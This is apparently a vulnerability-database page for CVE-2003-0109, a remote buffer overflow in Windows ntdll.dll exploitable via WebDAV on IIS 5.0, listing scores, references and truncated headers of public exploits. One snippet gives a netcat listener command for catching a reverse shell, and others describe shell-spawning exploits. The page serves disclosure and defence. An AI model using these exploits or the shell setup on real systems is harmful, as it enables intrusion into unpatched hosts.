Published: 31/03/2003 Updated: 07/11/2023

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

VMScore: 795

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote malicious users to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0.

Vulnerable Product	Search on Vulmon	Subscribe to Product
microsoft windows 2000 terminal services
microsoft windows 2000

/* * IIS 50 WebDAV Exploit Xnuxer Lab * By Schizoprenic, Copyright (c) 2003 * WebDAV exploit without netcat or telnet and with pretty magic number as RET */ #include <stdioh> #include <errnoh> #include <stringh> #include <stdlibh> #include <fcntlh> #include <sys/typesh> #include <sys/socketh> # ...

source: wwwsecurityfocuscom/bid/7116/info The Windows library ntdlldll includes a function that does not perform sufficient bounds checking The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it One of these programs i ...

## # $Id: ms03_007_ntdll_webdavrb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' ...

E-DB Note: Updated Exploit ~ wwwexploit-dbcom/exploits/22368/ source: wwwsecurityfocuscom/bid/7116/info The Windows library ntdlldll includes a function that does not perform sufficient bounds checking The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that ...

/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ /* 29/05/2003 - by Alumni - */ /* Microsoft IIS WebDAV New Exploit */ /* spawns shell on port 32768 */ /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ #include <stdioh> #include <winsockh> #include <windowsh> #define ...

/*******************************************************************/ /* [Crpt] ntdlldll exploit trough WebDAV by kralor [Crpt] */ /* --------------------------------------------------------------- */ /* this is the exploit for ntdlldll through WebDAV */ /* run a netcat ex: nc -L -vv -p 666 */ /* wb servercom your_ip 666 0 */ /* the shellcode i ...

/*************************************/ /* IIS 50 WebDAV -Proof of concept- */ /* [ Bug: CAN-2003-0109 ] */ /* By Roman Medina-Heigl Hernandez */ /* aka RoMaNSoFt <roman@rs-labscom> */ /* Madrid, 23Mar2003 */ /* ================================= */ /* Public release Version 1 */ /* --------------------------------- */ /***************** ...

NVD-CWE-Other http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=22029 http://www.cert.org/advisories/CA-2003-09.html http://www.iss.net/security_center/static/11533.php http://www.securityfocus.com/bid/7116 http://www.nextgenss.com/papers/ms03-007-ntdll.pdf http://www.kb.cert.org/vuls/id/117394 http://microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en http://marc.info/?l=bugtraq&m=104869293619064&w=2 http://marc.info/?l=bugtraq&m=104887148323552&w=2 http://marc.info/?l=bugtraq&m=105768156625699&w=2 http://marc.info/?l=bugtraq&m=104861839130254&w=2 http://marc.info/?l=bugtraq&m=104826476427372&w=2 http://marc.info/?l=ntbugtraq&m=104826785731151&w=2 https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A109 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-007 http://support.microsoft.com/default.aspx?scid=kb%3B%5BLN%5D%3BQ815021 https://nvd.nist.gov https://www.kb.cert.org/vuls/id/117394 https://www.exploit-db.com/exploits/51/

Get Started

CVE-2003-0109

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect